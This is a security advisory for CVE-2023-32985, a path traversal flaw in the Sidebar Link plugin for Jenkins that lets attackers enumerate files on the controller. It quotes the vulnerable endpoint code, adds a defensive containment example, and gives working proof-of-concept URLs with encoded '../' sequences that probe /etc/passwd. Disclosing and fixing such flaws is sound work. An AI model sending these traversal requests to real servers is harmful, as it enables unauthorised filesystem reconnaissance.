Coordinated Disclosure Timeline
- 2023-04-13: Issue reported to the Jenkins Security Team.
- 2023-05-16: Issue is fixed and advisory published.
Summary
Sidebar Link Plug-in for Jenkins 2.2.1 and earlier does not restrict a file path parameter in an HTTP endpoint, allowing authenticated attackers to enumerate arbitrary files on the Jenkins controller file system.
Product
Sidebar Link Plug-in for Jenkins
Tested Version
Details
Filesystem enumeration in SidebarLinkPlugin.java (GHSL-2023-076)
The Sidebar Link Jenkins plugin implements an HTTP endpoint, doCheckLinkIcon, that receives a value parameter. This parameter is used to build a filesystem path on the Jenkins controller and to check whether that path exists:
src/main/java/hudson/plugins/sidebar_link/SidebarLinkPlugin.java:137
public FormValidation doCheckLinkIcon(@QueryParameter String value) {
    if (StringUtils.isBlank(value)) {
        return FormValidation.warning("The provided icon is blank or empty. Default will be used.");
    } else
    // do not validate if default icon is used
    if (!value.equals(LinkAction.DEFAULT_ICON_NAME)) {
        // value is joined to the controller's root path without any validation
        FilePath imageFile = Jenkins.get().getRootPath().child(value);
        try {
            if (!imageFile.exists()) {
                return FormValidation.error("Image does not exist: " + imageFile);
            }
        } catch (Exception e) {
            return FormValidation.error(e, "Problem with link icon: " + value);
        }
    }
    return FormValidation.ok();
}
Since no validation is performed on the parameter, it can contain .. sequences that escape the intended Jenkins root directory. The plugin returns a different message depending on whether the file exists, which allows attackers to enumerate the controller filesystem by sending multiple requests with different paths and filenames.
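The following is an added example of the containment check the endpoint lacks; it is not the plugin's code or its eventual fix. It uses plain java.nio.file instead of Jenkins' FilePath, the root directory /var/lib/jenkins and the class name IconPathCheck are assumed, and it assumes a POSIX path layout.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

// Added example, not the plugin's own code: validate a user-supplied
// relative icon name so it cannot be resolved outside a fixed root.
public class IconPathCheck {

    // Stands in for Jenkins.get().getRootPath(); hypothetical value.
    static final Path ROOT = Paths.get("/var/lib/jenkins");

    /**
     * Returns the resolved path if value stays under ROOT, or null if it
     * escapes via "..", is absolute, is empty, or resolves to ROOT itself.
     */
    static Path resolveInsideRoot(String value) {
        if (value == null || value.isEmpty()) {
            return null;
        }
        Path candidate = Paths.get(value);
        // An absolute value such as "/etc/passwd" must never be resolved.
        if (candidate.isAbsolute()) {
            return null;
        }
        // Normalize after resolving so "../../etc/passwd" collapses, then
        // require the result to still be a descendant of ROOT.
        Path resolved = ROOT.resolve(candidate).normalize();
        if (!resolved.startsWith(ROOT) || resolved.equals(ROOT)) {
            return null;
        }
        // Note: normalize() does not follow symlinks; toRealPath() would,
        // but only for paths that already exist.
        return resolved;
    }

    // Hardened message logic: a rejected value gets one generic message
    // and no filesystem lookup, so the response leaks nothing about
    // files outside ROOT. Only a validated path is ever checked for existence.
    static String checkLinkIcon(String value) {
        Path p = resolveInsideRoot(value);
        if (p == null) {
            return "Invalid icon name";
        }
        return "OK: " + ROOT.relativize(p);
    }

    public static void main(String[] args) {
        System.out.println(checkLinkIcon("images/icon.png"));
        System.out.println(checkLinkIcon("../../../../../../../etc/passwd"));
        System.out.println(checkLinkIcon("/etc/passwd"));
        System.out.println(checkLinkIcon("images/../../etc/passwd"));
    }
}
```

Only the first call passes; the three traversal attempts get the same generic message without touching the filesystem.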
Impact
This issue may lead to information disclosure.
PoC
To exploit this issue, attackers could make GET requests to the checkLinkIcon endpoint containing the desired paths to be enumerated.
Example of a negative request: http://localhost:8080/jenkins/job/test/descriptorByName/hudson.plugins.sidebar_link.SidebarLinkPlugin/checkLinkIcon?value=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/b
Response: Image does not exist: /etc/b
Example of a positive request: http://localhost:8080/jenkins/job/test/descriptorByName/hudson.plugins.sidebar_link.SidebarLinkPlugin/checkLinkIcon?value=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
Response: HTTP 200 OK
CVE
- CVE-2023-32985
Resources
Credit
This issue was discovered and reported by CodeQL team member @atorralba (Tony Torralba).
Contact
You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2023-076 in any communication regarding this issue.